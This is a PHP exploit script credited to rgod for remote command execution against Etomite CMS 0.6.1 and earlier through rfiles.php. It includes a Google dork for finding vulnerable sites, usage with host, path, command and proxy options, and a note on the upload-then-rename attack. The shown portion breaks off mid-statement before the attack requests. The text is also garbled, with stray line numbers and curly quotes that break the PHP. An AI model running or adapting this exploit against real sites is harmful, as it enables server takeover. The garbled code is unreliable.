#!/usr/bin/php -q -d short_open_tag=on
<?php
// Banner printed on every run; CRLF line endings, one blank line after.
echo implode("\r\n", [
    "Etomite CMS <= 0.6.1 'rfiles.php' remote command execution",
    'by rgod rgod@autistici.org',
    'site: http://retrogod.altervista.org',
    'google dork: "Content managed by the Etomite Content Management System"',
]) . "\r\n\r\n";
7
8 /*
9 works regardless of php.ini settings
10 */
11
// Minimal argument check: $argv[0] plus host, path and cmd are required.
// Note the two examples below pass only host and path, which this guard
// rejects, so they do not reach the rest of the script.
if ($argc < 4) {
    echo implode("\r\n", [
        "Usage: php {$argv[0]} host path cmd OPTIONS",
        'host: target server (ip/hostname)',
        'path: path to etomite',
        'Options:',
        ' -p[port]: specify a port other than 80',
        ' -P[ip:port]: specify a proxy',
        'Examples:',
        "php {$argv[0]} localhost /etomite/ ",
        "php {$argv[0]} localhost / -P1.1.1.1:80",
    ]) . "\r\n";
    die;
}
24
/*
software site: http://www.etomite.org/

explanation:

if the rfiles.php script can be called directly, an image file can be uploaded
and then renamed with a .php extension, after which commands can be run...

*/
34
// Runtime tuning for the CLI run: silence every PHP diagnostic, lift the
// script time limit, and cap socket connects/reads at five seconds so a
// silent host cannot stall the script. error_reporting(0) also hides the
// warnings that would otherwise explain a failed socket call.
error_reporting(0);
ini_set('max_execution_time', 0);
ini_set('default_socket_timeout', 5);
38
/**
 * Render $string as a hex dump: a hex part (two lowercase digits per byte,
 * each preceded by a space) followed by a matching printable part where any
 * byte outside 33..126 is shown as ".". Both parts wrap every 15 bytes.
 *
 * Deliberately byte-wise (no mb_* functions): the input is raw data.
 *
 * @param string $string raw bytes to dump
 * @return string the hex part, "\r\n", then the printable part
 */
function quick_dump($string)
{
    $hexPart = '';
    $asciiPart = '';
    // unpack('C*') yields 1-based positions, so a line break is due whenever
    // the position is a multiple of 15; an empty string yields no entries.
    foreach (unpack('C*', $string) as $position => $byte) {
        $printable = $byte > 32 && $byte <= 126;
        $asciiPart .= $printable ? ' ' . chr($byte) : ' .';
        $hexPart .= sprintf(' %02x', $byte);
        if ($position % 15 === 0) {
            $hexPart .= "\r\n";
            $asciiPart .= "\r\n";
        }
    }
    return $hexPart . "\r\n" . $asciiPart;
}
56 $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
57 function sendpacketii($packet)
58 {
59 global $proxy, $host, $port, $html, $proxy_regex;
60 if ($proxy==’’) {
61 $ock=fsockopen(gethostbyname($host),$port);
62 if (!$ock) {
63 echo ’No response from ’.